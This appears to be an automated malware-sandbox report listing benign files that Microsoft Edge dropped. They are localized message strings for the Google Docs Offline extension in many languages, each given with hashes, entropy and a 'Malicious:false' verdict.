                                                                                                                                                                                                                                                                          MD5:83E0E58D0752FF7C3F888E6406413B84
                                                                                                                                                                                                                                                                          SHA1:14A8981E4355301BB3073DB6D7FFB337EF8482E3
                                                                                                                                                                                                                                                                          SHA-256:64E01BC292BA2EA1699576FCC445367047520EE895E290CCEE20C24C9336D8EF
                                                                                                                                                                                                                                                                          SHA-512:FC772BD3D6AC64110562AACA7D320F49FFBA4E1F9AC2E10456FCB75E172D086D3CE8996CFC64B33B2ECDF4F6B96E38905E671C1E6BA5205FEDE9AF4A183812C4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u12a0\u12f2\u1235 \u134d\u1320\u122d"},"explanationofflinedisabled":{"message":"\u12a8\u1218\u1235\u1218\u122d \u12cd\u132d \u1290\u12ce\u1275\u1362 Google \u1230\u1290\u12f6\u127d\u1295 \u12eb\u1208\u1260\u12ed\u1290\u1218\u1228\u1265 \u130d\u1295\u1299\u1290\u1275 \u1208\u1218\u1320\u1240\u121d \u1260Google \u1230\u1290\u12f6\u127d \u1218\u1290\u123b \u1308\u1345 \u120b\u12ed \u12c8\u12f0 \u1245\u1295\u1265\u122e\u127d \u12ed\u1202\u12f1\u1293 \u12a8\u1260\u12ed\u1290\u1218\u1228\u1261 \u130b\u122d \u1260\u121a\u1308\u1293\u1299\u1260\u1275 \u1240\u1323\u12e9 \u130a\u12dc \u120b\u12ed \u12e8\u1218\u1235\u1218\u122d \u12cd\u132d \u1235\u121d\u1228\u1275\u1295 \u12eb\u1265\u1229\u1362"},"explanationofflineenabled":{"message":"\u12a8\u1218\u1235\u1218\u122d \u12cd\u132d \u1290\u12ce\u1275\u1363 \u1290\u1308\u122d \u130d\u1295 \u12a0\u1201\u1295\u121d \u12e8\u121a\u1308\u1299 \u134b\u12ed\u120e\u127d\u1295 \u121b\u122d\u1275\u12d5 \u12c8\u12ed\u121d \u12a0\u12f2
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2673
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7623737593212434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:Y3XjcMhavdrbYTESRvqCR9YEhB1bitNwttdajAldAtan19iZVuveVtj6zIkJrFvN:YIuwmpX3Z
                                                                                                                                                                                                                                                                          MD5:C825621044E4D5C504404DAE9752285C
                                                                                                                                                                                                                                                                          SHA1:68C1E29DAF042487CB76629ABCDC03F16FCCC92A
                                                                                                                                                                                                                                                                          SHA-256:47652115CBB912907F405992FCFC64F987642158F0CB35C9D6E0D4742D833802
                                                                                                                                                                                                                                                                          SHA-512:4AEF3E7A747E290BE8BA10E22E670C1C2DC653D4311020A4FD3060205FD88BB5D13D9EDF388FC18919ABE353C62D6841A4EF87E38064430299E52CA16C81941E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0625\u0646\u0634\u0627\u0621 \u062c\u062f\u064a\u062f"},"explanationofflinedisabled":{"message":"\u0623\u0646\u062a \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644\u060c \u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u0633\u062a\u0646\u062f\u0627\u062a Google \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a\u060c \u0627\u0646\u062a\u0642\u0644 \u0625\u0644\u0649 \u0627\u0644\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0641\u064a \u0627\u0644\u0635\u0641\u062d\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0644\u0645\u0633\u062a\u0646\u062f\u0627\u062a Google \u0648\u0634\u063a\u0651\u0644 \u0627\u0644\u0645\u0632\u0627\u0645\u0646\u0629 \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644 \u0641\u064a \u0627\u0644\u0645\u0631\u0629 \u0627\u0644\u0642\u0627\u062f\u0645\u0629 \u0627\u0644\u062a\u064a \u062a\u062a\u0635\u0644 \u0641\u064a\u0647\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1134
                                                                                                                                                                                                                                                                          Entropy (8bit):4.946697942298551
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YjF5pt3w68IShJyEp36tE3sx8KdEELlUFPA4HWlsLVtM:YjXp5Szpt6q3leZEBp4
                                                                                                                                                                                                                                                                          MD5:C603747B8578C1324DD262565F643E06
                                                                                                                                                                                                                                                                          SHA1:5CD18BB971AF007D9A589377A662688DAAFE7519
                                                                                                                                                                                                                                                                          SHA-256:614470DA3C5034ACE649F1786BEAAAD2C94F4475BCC8858390B721F06FB7BF64
                                                                                                                                                                                                                                                                          SHA-512:59A5B29459E6A10628AB95ED620AB159DACDE2D98DC2C3DC7949D0E5E253F2BE7A21CB13F0EE8AE0E2F85191A520C9DAF797FD93B27C39F53B1FAA8AEF1B706A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"YEN\u0130S\u0130N\u0130 YARADIN"},"explanationofflinedisabled":{"message":"Oflayns\u0131n\u0131z. Google S\u0259n\u0259di internet ba\u011flant\u0131s\u0131 olmadan istifad\u0259 etm\u0259k ist\u0259yirsinizs\u0259, Google S\u0259n\u0259din \u0259sas s\u0259hif\u0259sind\u0259 ayarlara gedin v\u0259 n\u00f6vb\u0259ti d\u0259f\u0259 internet\u0259 qo\u015fulanda oflayn sinxronizasiyan\u0131 aktiv edin."},"explanationofflineenabled":{"message":"Oflayns\u0131n\u0131z, amma m\u00f6vcud fayllar\u0131 redakt\u0259 ed\u0259 v\u0259 yenil\u0259rini yarada bil\u0259rsiniz."},"extdesc":{"message":"S\u0259n\u0259d, c\u0259dv\u0259l v\u0259 t\u0259qdimatlar\u0131n ham\u0131s\u0131n\u0131 internet olmadan redakt\u0259 edin, yarad\u0131n v\u0259 bax\u0131n."},"extname":{"message":"Google S\u0259n\u0259d Oflayn"},"learnmore":{"message":"\u018ftrafl\u0131 M\u0259lumat"},"popuphelptext":{"message":"Harda olma\u011f\u0131n\u0131zdan v\u0259 internet\u0259 qo\u015fulu olub-olmad\
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                          Entropy (8bit):4.737169815587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGq1xWusXuqgA2fTq9LfXUJawSxrbBODgdU44pMiiwseeJ//yJgvskSF7L+mZn:Yx/s+B2LfkxSPdh1ih5W//DvskJc
                                                                                                                                                                                                                                                                          MD5:FBB841A2982166239D68907361F41F61
                                                                                                                                                                                                                                                                          SHA1:4A8D76A6FE1BB111FDBDFD42D1AF0019A97FC540
                                                                                                                                                                                                                                                                          SHA-256:DE6D7B7C2427EC4E738407D7834B71941F69166B030355E00F325FF1391DF5A1
                                                                                                                                                                                                                                                                          SHA-512:8DB540B4C9E250D3781797238B1D16AD820C568EDC563BFB912872AB99950DEF7E89EE432C696BA9876E3D7B24A4E4C26FA5B0FA9E76A54E11AE63996E02A561
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREA'N UN DE NOU"},"explanationofflinedisabled":{"message":"No tens connexi\u00f3. Per utilitzar Documents de Google sense connexi\u00f3 a Internet, ves a la configuraci\u00f3 de la p\u00e0gina d'inici d'aquest servei i activa l'opci\u00f3 per sincronitzar-se sense connexi\u00f3 la propera vegada que estiguis connectat a la xarxa."},"explanationofflineenabled":{"message":"Tot i que no tens connexi\u00f3, pots editar o crear fitxers."},"extdesc":{"message":"Edita, crea i consulta documents, fulls de c\u00e0lcul i presentacions, tot sense acc\u00e9s a Internet."},"extname":{"message":"Documents de Google sense connexi\u00f3"},"learnmore":{"message":"M\u00e9s informaci\u00f3"},"popuphelptext":{"message":"Escriu text, edita fitxers i col\u00b7labora-hi siguis on siguis, amb o sense connexi\u00f3 a Internet."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):953
                                                                                                                                                                                                                                                                          Entropy (8bit):4.879531339602706
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGsjxSGobXPj+dW2eqOTvo6NxFQcgdpXmSLZxZkwyXLmijk/RsYMVP4MVHRn:YtjgGoPwEPTlNnsdBmuTZpzJ2YFMnn
                                                                                                                                                                                                                                                                          MD5:48663A88DCF0EF6C9FADE9BEE4935B91
                                                                                                                                                                                                                                                                          SHA1:AF7CAD1498BB4B0F05C1468ABE3563D0182A97B4
                                                                                                                                                                                                                                                                          SHA-256:5A701D67910BA6C7CCEDC26E02FA707CC86A1BE57CD7D36290A3D268732A42C7
                                                                                                                                                                                                                                                                          SHA-512:3C3E5B9E56535EFE1E20D6024B6FA46D3EA969C971D5EC8F5AF1C933C1FEB75D25E7F26C9E2BB8D200BCA70EA1F1BD7E93E4E1C09DBC447340CDBEEFA91CC33F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"VYTVO\u0158IT"},"explanationofflinedisabled":{"message":"Jste offline. Pokud chcete Dokumenty Google pou\u017e\u00edvat bez p\u0159ipojen\u00ed k\u00a0internetu, a\u017e budete p\u0159\u00ed\u0161t\u011b online, p\u0159ejd\u011bte do nastaven\u00ed na domovsk\u00e9 str\u00e1nce Dokument\u016f Google a\u00a0zapn\u011bte offline synchronizaci."},"explanationofflineenabled":{"message":"Jste offline, ale st\u00e1le m\u016f\u017eete upravovat dostupn\u00e9 soubory nebo vytv\u00e1\u0159et nov\u00e9."},"extdesc":{"message":"Upravujte, vytv\u00e1\u0159ejte a\u00a0zobrazujte sv\u00e9 dokumenty, tabulky a\u00a0prezentace \u2013 v\u0161e bez p\u0159\u00edstupu k\u00a0internetu."},"extname":{"message":"Dokumenty Google offline"},"learnmore":{"message":"Dal\u0161\u00ed informace"},"popuphelptext":{"message":"Pi\u0161te, upravujte a\u00a0spolupracujte kdekoli, s\u00a0p\u0159ipojen\u00edm k\u00a0internetu i\u00a0bez n\u011bj."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):764
                                                                                                                                                                                                                                                                          Entropy (8bit):4.651259056196555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGxxeKzFkQdxaUZL6f1DOzelaOx7KhqgBJrN0x1gdeXW95AXWMwuRuxXzDyqZyFT:YI5FkQdUUIf1ypOeqgBYGdeXW9fWRuxc
                                                                                                                                                                                                                                                                          MD5:0E451C9C8453577E513AABF630C275F2
                                                                                                                                                                                                                                                                          SHA1:5912CC58AA82BC75691540C8AEACA7C68641539E
                                                                                                                                                                                                                                                                          SHA-256:94CDDB998C2C5AB40B6F074C359A60E6EEBAAA2D52A9649C22F4EA4C1B9936F2
                                                                                                                                                                                                                                                                          SHA-512:A89DCC1EC8C79E7CF702692E20EBC952907B2FB1D76A3BEEF60D7415BAEE24E055E2988B55E12CE00BC112C115DDD9D46D63BF0A1C511FFFB041DA7054391F80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"OPRET NYT"},"explanationofflinedisabled":{"message":"Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g\u00e5 til indstillinger p\u00e5 startsiden for Google Docs og aktivere offlinesynkronisering, n\u00e6ste gang du har internetforbindelse."},"explanationofflineenabled":{"message":"Du er offline, men du kan stadig redigere tilg\u00e6ngelige filer eller oprette nye."},"extdesc":{"message":"Rediger, opret og se dine dokumenter, regneark og pr\u00e6sentationer helt uden internetadgang."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"F\u00e5 flere oplysninger"},"popuphelptext":{"message":"Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3726
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6864881891406736
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y5prjrLX68uln3IIjrIJVkEvwjrjnIv/kPICH1LkIyo7NyjI8+8qjrlQ9IcXrhyu:urMFBYJiywTI3CH1L9NyMbuOcXrhN
                                                                                                                                                                                                                                                                          MD5:32886978EF4B5231F921EB54E683EB10
                                                                                                                                                                                                                                                                          SHA1:9E2626E158CBD26A2A24A50E4E8CFD98A49984E9
                                                                                                                                                                                                                                                                          SHA-256:728D8CBD71263680A4E41399DB65B3F2B8175D50CA630AFD30643CED9FFE831F
                                                                                                                                                                                                                                                                          SHA-512:416832F007470BF4D9D915410B62BD8159029D5DDABED23D2BBC297E4BBAE46F4346FEB68C54163428A6932C537967AE9EF430B9FAC111F15CFB001A480799B3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0394\u0397\u039c\u0399\u039f\u03a5\u03a1\u0393\u0399\u0391 \u039d\u0395\u039f\u03a5"},"explanationofflinedisabled":{"message":"\u0395\u03af\u03c3\u03c4\u03b5 \u03b5\u03ba\u03c4\u03cc\u03c2 \u03c3\u03cd\u03bd\u03b4\u03b5\u03c3\u03b7\u03c2. \u0393\u03b9\u03b1 \u03bd\u03b1 \u03c7\u03c1\u03b7\u03c3\u03b9\u03bc\u03bf\u03c0\u03bf\u03b9\u03ae\u03c3\u03b5\u03c4\u03b5 \u03c4\u03b1 \u0388\u03b3\u03b3\u03c1\u03b1\u03c6\u03b1 Google \u03c7\u03c9\u03c1\u03af\u03c2 \u03c3\u03cd\u03bd\u03b4\u03b5\u03c3\u03b7 \u03c3\u03c4\u03bf \u03b4\u03b9\u03b1\u03b4\u03af\u03ba\u03c4\u03c5\u03bf, \u03bc\u03b5\u03c4\u03b1\u03b2\u03b5\u03af\u03c4\u03b5 \u03c3\u03c4\u03b9\u03c2 \u03c1\u03c5\u03b8\u03bc\u03af\u03c3\u03b5\u03b9\u03c2 \u03c3\u03c4\u03b7\u03bd \u03b1\u03c1\u03c7\u03b9\u03ba\u03ae \u03c3\u03b5\u03bb\u03af\u03b4\u03b1 \u03c4\u03c9\u03bd \u0395\u03b3\u03b3\u03c1\u03ac\u03c6\u03c9\u03bd Google \u03ba\u03b1\u03b9 \u03b5\u03bd\u03b5\u03c1\u03b3\u03bf\u03c0\u03bf\u03b9\u03ae\u03c3\u03c
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711
                                                                                                                                                                                                                                                                          Entropy (8bit):4.623529061631689
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGGfBxEN3Pj1NzXW6iFrVxYJGceWgd/NnKAfArMwuRqtxdATxiPB:YfJK/BNzXviFrVa4dd/N94rWRaAaB
                                                                                                                                                                                                                                                                          MD5:558659936250E03CC14B60EBF648AA09
                                                                                                                                                                                                                                                                          SHA1:32F1CE0361BBFDFF11E2FFD53D3AE88A8B81A825
                                                                                                                                                                                                                                                                          SHA-256:2445CAD863BE47BB1C15B57A4960B7B0D01864E63CDFDE6395F3B2689DC1444B
                                                                                                                                                                                                                                                                          SHA-512:1632F5A3CD71887774BF3CB8A4D8B787EA6278271657B0F1D113DBE1A7FD42C4DAA717CC449F157CE8972037572B882DC946A7DC2C0E549D71982DCDEE89F727
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREATE NEW"},"explanationofflinedisabled":{"message":"You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet."},"explanationofflineenabled":{"message":"You're offline, but you can still edit available files or create new ones."},"extdesc":{"message":"Edit, create, and view your documents, spreadsheets, and presentations \u2014 all without internet access."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"Learn More"},"popuphelptext":{"message":"Write, edit, and collaborate wherever you are, with or without an internet connection."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1353
                                                                                                                                                                                                                                                                          Entropy (8bit):4.46957273133348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:ifG+18NQpTmavDFJKrbAUsDAa9xaCBiiK5ybsCrs4VKHszb/BNzXviFrTKnC:IGKpTmOFJKrbJaVTRBNK5ybsCtVKHs3m
                                                                                                                                                                                                                                                                          MD5:64EAEB92CB15BF128429C2354EF22977
                                                                                                                                                                                                                                                                          SHA1:45EC549ACAA1FDA7C664D3906835CED6295EE752
                                                                                                                                                                                                                                                                          SHA-256:4F70ECA8E28541855A11EC7A4E6B3BC6DD16C672FF9B596ECFB7715BB3B5898C
                                                                                                                                                                                                                                                                          SHA-512:F63EE02159812146EEE84C4EB2034EDFC2858A287119CC34A8B38C309C1B98953E14CA1CA6304D6B32B715754B15BA1B3AA4B46976631B5944D50581B2F49DEF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{. "extName": {. "message": "Google Docs Offline",. "description": "Extension name". },. "extDesc": {. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",. "description": "Extension description". },. "createNew": {. "message": "CREATE NEW",. "description": "Text shown in the extension pop up for creating a new document". },. "popupHelpText": {. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.",. "description": "Help text that is shown as part of the extension pop-up title". },. "learnMore": {. "message": "Learn More",. "description": "Text shown after the help text that the user can click to learn more.". },. "explanationOfflineEnabled": {. "message": "You're offline, but you can still edit available files or create new ones.",. "description": "Text shown in the extension popup when the user is offline and offline is enabled.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                          Entropy (8bit):4.707262377134109
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREAR"},"explanationofflinedisabled":{"message":"No tienes conexi\u00f3n. Para usar Documentos de Google sin conexi\u00f3n a Internet, ve a Configuraci\u00f3n en la p\u00e1gina principal de Documentos de Google y activa la sincronizaci\u00f3n sin conexi\u00f3n la pr\u00f3xima vez que te conectes a Internet."},"explanationofflineenabled":{"message":"No tienes conexi\u00f3n. Aun as\u00ed, puedes crear archivos o editar los que est\u00e9n disponibles."},"extdesc":{"message":"Edita, crea y consulta tus documentos, hojas de c\u00e1lculo y presentaciones; todo ello, sin acceso a Internet."},"extname":{"message":"Documentos de Google sin conexi\u00f3n"},"learnmore":{"message":"M\u00e1s informaci\u00f3n"},"popuphelptext":{"message":"Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi\u00f3n a Internet."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.7690437626114095
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"LOO UUS"},"explanationofflinedisabled":{"message":"Teil ei ole v\u00f5rgu\u00fchendust. Teenuse Google\u2019i dokumendid kasutamiseks ilma Interneti-\u00fchenduseta avage j\u00e4rgmine kord, kui olete Internetiga \u00fchendatud, teenuse Google\u2019i dokumendid avalehel seaded ja l\u00fclitage sisse v\u00f5rgu\u00fchenduseta s\u00fcnkroonimine."},"explanationofflineenabled":{"message":"Teil ei ole v\u00f5rgu\u00fchendust, kuid saate endiselt saadaolevaid faile muuta v\u00f5i uusi luua."},"extdesc":{"message":"Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-\u00fchenduseta."},"extname":{"message":"V\u00f5rgu\u00fchenduseta Google\u2019i dokumendid"},"learnmore":{"message":"Lisateave"},"popuphelptext":{"message":"Kirjutage, muutke ja tehke koost\u00f6\u00f6d \u00fcksk\u00f5ik kus olenemata sellest, kas teil on Interneti-\u00fchendus."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                          Entropy (8bit):4.752980827747988
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"LUO UUSI"},"explanationofflinedisabled":{"message":"Olet offline-tilassa. Jos haluat k\u00e4ytt\u00e4\u00e4 Google Docsia ilman internetyhteytt\u00e4, siirry Google Docsin etusivulle ja ota asetuksissa k\u00e4ytt\u00f6\u00f6n offline-synkronointi, kun seuraavan kerran olet yhteydess\u00e4 internetiin."},"explanationofflineenabled":{"message":"Olet offline-tilassa. Voit kuitenkin muokata k\u00e4ytett\u00e4viss\u00e4 olevia tiedostoja tai luoda uusia."},"extdesc":{"message":"Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi\u00e4 ilman internetyhteytt\u00e4."},"extname":{"message":"Google Docsin offline-tila"},"learnmore":{"message":"Lis\u00e4tietoja"},"popuphelptext":{"message":"Kirjoita, muokkaa ja tee yhteisty\u00f6t\u00e4 paikasta riippumatta, my\u00f6s ilman internetyhteytt\u00e4."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):799
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5651810777615305
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"GUMAWA NG BAGO"},"explanationofflinedisabled":{"message":"Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet."},"explanationofflineenabled":{"message":"Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago."},"extdesc":{"message":"I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation \u2014 lahat ng ito nang walang access sa internet."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"Matuto Pa"},"popuphelptext":{"message":"Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):756
                                                                                                                                                                                                                                                                          Entropy (8bit):4.568978941644684
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREA NUOVO"},"explanationofflinedisabled":{"message":"Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet."},"explanationofflineenabled":{"message":"Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi."},"extdesc":{"message":"Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet."},"extname":{"message":"Documenti Google offline"},"learnmore":{"message":"Ulteriori informazioni"},"popuphelptext":{"message":"Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1779
                                                                                                                                                                                                                                                                          Entropy (8bit):4.178873861626396
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YW5wHiffZLuSU5VHifpDHgL0z80CtZ78988qyHjQBZU0CM:9oGQ5fiT4Hz98PoKW
                                                                                                                                                                                                                                                                          MD5:113A674F2E4C66CC4D2A9C66ED77ADEA
                                                                                                                                                                                                                                                                          SHA1:F5D38B743EFA022D6F886BACD3AFA850557E2762
                                                                                                                                                                                                                                                                          SHA-256:C1094A1D8457E782F229910B70FC7AECE356AA779A423E869104946814660D35
                                                                                                                                                                                                                                                                          SHA-512:E7CD847D87DFEA3228A1899AAB7F27F59D7BA2919E81520501A9236C55FCDEA418F1D29C3C9EB36E34CDFBA3278E3BBD149DDF324C94295E029031FCD5A75677
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
